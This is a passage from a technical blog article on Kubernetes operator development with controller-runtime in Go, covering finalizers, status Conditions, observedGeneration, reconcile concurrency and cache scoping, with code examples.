    &lt;span class="n"&gt;db&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;myv1&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Database&lt;/span&gt;&lt;span class="p"&gt;{}&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;req&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;NamespacedName&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;db&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;ctrl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Result&lt;/span&gt;&lt;span class="p"&gt;{},&lt;/span&gt; &lt;span class="n"&gt;client&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;IgnoreNotFound&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;err&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;db&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;DeletionTimestamp&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;IsZero&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="c"&gt;// Object is being deleted&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;controllerutil&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ContainsFinalizer&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;db&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;myFinalizer&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;runCleanup&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;db&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;ctrl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Result&lt;/span&gt;&lt;span class="p"&gt;{},&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;
            &lt;span class="n"&gt;controllerutil&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;RemoveFinalizer&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;db&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;myFinalizer&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;ctrl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Result&lt;/span&gt;&lt;span class="p"&gt;{},&lt;/span&gt; &lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Update&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;db&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;ctrl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Result&lt;/span&gt;&lt;span class="p"&gt;{},&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="c"&gt;// Add finalizer if not present&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;controllerutil&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ContainsFinalizer&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;db&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;myFinalizer&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;controllerutil&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;AddFinalizer&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;db&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;myFinalizer&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;ctrl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Result&lt;/span&gt;&lt;span class="p"&gt;{},&lt;/span&gt; &lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Update&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;db&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="c"&gt;// Normal reconciliation...&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;A critical warning&lt;/strong&gt;: Finalizer logic must be robust and eventually complete. A finalizer that never removes itself will prevent the object from being garbage collected forever. Always provide a way to force-remove the finalizer in operational runbooks.&lt;/p&gt;





&lt;h2&gt;
  
  
  Status Subresource and Conditions
&lt;/h2&gt;

&lt;p&gt;Your operator's primary communication channel with users (and other systems) is the &lt;code&gt;status&lt;/code&gt; field. Get this right.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fo4vixpelyuftt8nj12bg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fo4vixpelyuftt8nj12bg.png" alt="image" width="800" height="675"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Always use the &lt;strong&gt;Conditions&lt;/strong&gt; pattern for status. It's the Kubernetes-idiomatic way to communicate multi-dimensional state. The example below uses condition types modeled after the common Kubernetes Deployment pattern — adapt the types to your domain:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;status&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;phase&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Running&lt;/span&gt;
  &lt;span class="na"&gt;observedGeneration&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;5&lt;/span&gt;    &lt;span class="c1"&gt;# which spec generation this status reflects&lt;/span&gt;
  &lt;span class="na"&gt;conditions&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Ready&lt;/span&gt;
      &lt;span class="na"&gt;status&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;True"&lt;/span&gt;
      &lt;span class="na"&gt;lastTransitionTime&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;2024-01-15T10:00:00Z"&lt;/span&gt;
      &lt;span class="na"&gt;reason&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;AllReplicasReady&lt;/span&gt;
      &lt;span class="na"&gt;message&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;3/3&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;replicas&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;are&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;ready"&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Progressing&lt;/span&gt;
      &lt;span class="na"&gt;status&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;False"&lt;/span&gt;
      &lt;span class="na"&gt;lastTransitionTime&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;2024-01-15T10:01:00Z"&lt;/span&gt;
      &lt;span class="na"&gt;reason&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ReplicaSetAvailable&lt;/span&gt;
      &lt;span class="na"&gt;message&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Rollout&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;complete"&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Available&lt;/span&gt;
      &lt;span class="na"&gt;status&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;True"&lt;/span&gt;
      &lt;span class="na"&gt;lastTransitionTime&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;2024-01-14T08:00:00Z"&lt;/span&gt;
      &lt;span class="na"&gt;reason&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;MinimumReplicasAvailable&lt;/span&gt;
      &lt;span class="na"&gt;message&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Deployment&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;has&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;minimum&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;availability"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;&lt;code&gt;observedGeneration&lt;/code&gt;&lt;/strong&gt; is critical and frequently missed. It tells observers which version of the spec this status corresponds to. Without it, you can't tell if &lt;code&gt;status.phase: Running&lt;/code&gt; means "running the spec you just applied" or "running an older spec while the new one is being processed."&lt;/p&gt;

&lt;p&gt;Always update status with &lt;code&gt;r.Status().Update(ctx, obj)&lt;/code&gt;, not &lt;code&gt;r.Update(ctx, obj)&lt;/code&gt;. The status subresource has a separate endpoint and a separate RBAC policy. The main update endpoint ignores status changes; the status endpoint ignores spec changes.&lt;/p&gt;





&lt;h2&gt;
  
  
  Generation vs ObservedGeneration: A Deep Dive
&lt;/h2&gt;

&lt;p&gt;This is one of the most misunderstood mechanics in operator development, yet it's fundamental to building correct status reporting. Let's be precise.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;metadata.generation&lt;/code&gt; is a monotonically incrementing integer managed entirely by the API server. It increments &lt;strong&gt;only when the spec changes&lt;/strong&gt; — status updates, label changes, and annotation changes do not increment it. This is why &lt;code&gt;GenerationChangedPredicate&lt;/code&gt; works: it filters out the noise.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;status.observedGeneration&lt;/code&gt; is a field your controller writes to &lt;code&gt;status&lt;/code&gt; after completing a reconciliation. It should be set to the &lt;code&gt;metadata.generation&lt;/code&gt; value of the object you just reconciled.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjzscln1ch3h760x6buy5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjzscln1ch3h760x6buy5.png" alt="image" width="800" height="535"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The pattern lets any observer — including &lt;code&gt;kubectl wait&lt;/code&gt;, GitOps controllers, and your own tooling — determine whether the controller has finished processing the latest spec without any out-of-band signaling:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="k"&gt;func&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;r&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;Reconciler&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;Reconcile&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt; &lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Context&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;req&lt;/span&gt; &lt;span class="n"&gt;ctrl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Request&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctrl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Result&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;error&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;db&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;myv1&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Database&lt;/span&gt;&lt;span class="p"&gt;{}&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;req&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;NamespacedName&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;db&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;ctrl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Result&lt;/span&gt;&lt;span class="p"&gt;{},&lt;/span&gt; &lt;span class="n"&gt;client&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;IgnoreNotFound&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;err&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="c"&gt;// ... reconcile logic ...&lt;/span&gt;

    &lt;span class="c"&gt;// At the end: stamp observedGeneration&lt;/span&gt;
    &lt;span class="n"&gt;db&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Status&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ObservedGeneration&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;db&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Generation&lt;/span&gt;
    &lt;span class="n"&gt;db&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Status&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Phase&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"Running"&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;ctrl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Result&lt;/span&gt;&lt;span class="p"&gt;{},&lt;/span&gt; &lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Status&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Update&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;db&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Without &lt;code&gt;observedGeneration&lt;/code&gt;, a &lt;code&gt;status.phase: Running&lt;/code&gt; is ambiguous — it could mean "running the spec you just applied 30 seconds ago" or "running an old spec that's three versions behind." With it, observers have a precise, reliable signal.&lt;/p&gt;
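&lt;p&gt;The observer-side check is mechanical. A minimal sketch with hypothetical simplified types: the controller has caught up with the latest spec only when &lt;code&gt;observedGeneration&lt;/code&gt; matches &lt;code&gt;generation&lt;/code&gt; and the status itself reports readiness:&lt;/p&gt;

```go
package main

import "fmt"

// Simplified stand-in for the Database object's relevant fields.
type database struct {
	Generation         int64  // metadata.generation
	ObservedGeneration int64  // status.observedGeneration
	Phase              string // status.phase
}

// caughtUp reports whether the status reflects the latest spec.
func caughtUp(db database) bool {
	return db.ObservedGeneration == db.Generation && db.Phase == "Running"
}

func main() {
	stale := database{Generation: 7, ObservedGeneration: 6, Phase: "Running"}
	fresh := database{Generation: 7, ObservedGeneration: 7, Phase: "Running"}
	fmt.Println(caughtUp(stale)) // false: "Running" refers to an older spec
	fmt.Println(caughtUp(fresh)) // true
}
```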





&lt;h2&gt;
  
  
  Concurrency, MaxConcurrentReconciles, and Cache Scoping
&lt;/h2&gt;

&lt;h3&gt;
  
  
  MaxConcurrentReconciles
&lt;/h3&gt;

&lt;p&gt;By default, controller-runtime runs &lt;strong&gt;one reconciler goroutine per controller&lt;/strong&gt;. For many operators this is fine, but for operators managing hundreds or thousands of independent custom resources, this is a significant throughput bottleneck. Enter &lt;code&gt;MaxConcurrentReconciles&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="n"&gt;ctrl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;NewControllerManagedBy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;mgr&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;
    &lt;span class="n"&gt;For&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;myv1&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Database&lt;/span&gt;&lt;span class="p"&gt;{})&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;
    &lt;span class="n"&gt;WithOptions&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;controller&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Options&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;MaxConcurrentReconciles&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="m"&gt;10&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;})&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;
    &lt;span class="n"&gt;Complete&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This allows up to 10 reconciler goroutines to run in parallel for different objects. A few important points:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The work queue guarantees per-object serialization.&lt;/strong&gt; Even with &lt;code&gt;MaxConcurrentReconciles: 10&lt;/code&gt;, the same &lt;code&gt;namespace/name&lt;/code&gt; key will never be dispatched to two goroutines simultaneously. You get concurrency across different objects, not within a single object's reconciliation chain.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Your reconciler must be goroutine-safe.&lt;/strong&gt; Any shared state (metrics counters, caches, client connections) must be safe for concurrent access. The controller-runtime client is safe. Custom state you add to the reconciler struct is your responsibility.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Rate limiting still applies globally.&lt;/strong&gt; High &lt;code&gt;MaxConcurrentReconciles&lt;/code&gt; combined with a tight rate limiter creates goroutines waiting on the rate limiter. Tune both together.&lt;/p&gt;

&lt;p&gt;A good starting heuristic comes from Little's law: set &lt;code&gt;MaxConcurrentReconciles&lt;/code&gt; to roughly the reconcile throughput you need (reconciles per second) multiplied by the average reconcile latency in seconds. For 1000 objects reconciling in ~500ms each, sweeping the full set every ~100 seconds requires ~10 reconciles per second, so &lt;code&gt;MaxConcurrentReconciles: 5&lt;/code&gt; gives you comfortable throughput headroom.&lt;/p&gt;
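&lt;p&gt;The arithmetic behind that sizing is Little's law: concurrency equals required throughput times latency. The 100-second full-sweep window below is an illustrative assumption:&lt;/p&gt;

```go
package main

import (
	"fmt"
	"math"
)

// workers returns the concurrency needed so that `objects` reconciliations,
// each taking `latencySec` seconds, all complete within a `sweepSec`-second
// window (Little's law: concurrency = throughput x latency).
func workers(objects int, latencySec, sweepSec float64) int {
	throughput := float64(objects) / sweepSec      // required reconciles/sec
	return int(math.Ceil(throughput * latencySec)) // reconciles in flight
}

func main() {
	// 1000 objects at ~500ms each, swept within ~100s:
	fmt.Println(workers(1000, 0.5, 100)) // 5
}
```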

&lt;h3&gt;
  
  
  Cache Scoping for Large Clusters
&lt;/h3&gt;

&lt;p&gt;By default, the controller-runtime cache watches all namespaces. In large multi-tenant clusters this can mean caching thousands of objects your operator doesn't care about. Cache scoping is the solution:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="n"&gt;mgr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="n"&gt;ctrl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;NewManager&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cfg&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ctrl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Options&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;Cache&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="n"&gt;cache&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Options&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="c"&gt;// Only cache objects in specific namespaces&lt;/span&gt;
        &lt;span class="n"&gt;DefaultNamespaces&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="k"&gt;map&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="kt"&gt;string&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="n"&gt;cache&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Config&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="s"&gt;"tenant-a"&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{},&lt;/span&gt;
            &lt;span class="s"&gt;"tenant-b"&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{},&lt;/span&gt;
        &lt;span class="p"&gt;},&lt;/span&gt;
    &lt;span class="p"&gt;},&lt;/span&gt;
&lt;span class="p"&gt;})&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Field indexing&lt;/strong&gt; is another powerful tool. If your reconciler frequently lists objects filtered by a custom field, add an index to the cache:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="c"&gt;// Index Databases by their referenced Secret name&lt;/span&gt;
&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="n"&gt;mgr&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;GetFieldIndexer&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;IndexField&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;myv1&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Database&lt;/span&gt;&lt;span class="p"&gt;{},&lt;/span&gt;
    &lt;span class="s"&gt;".spec.credentialsSecret"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
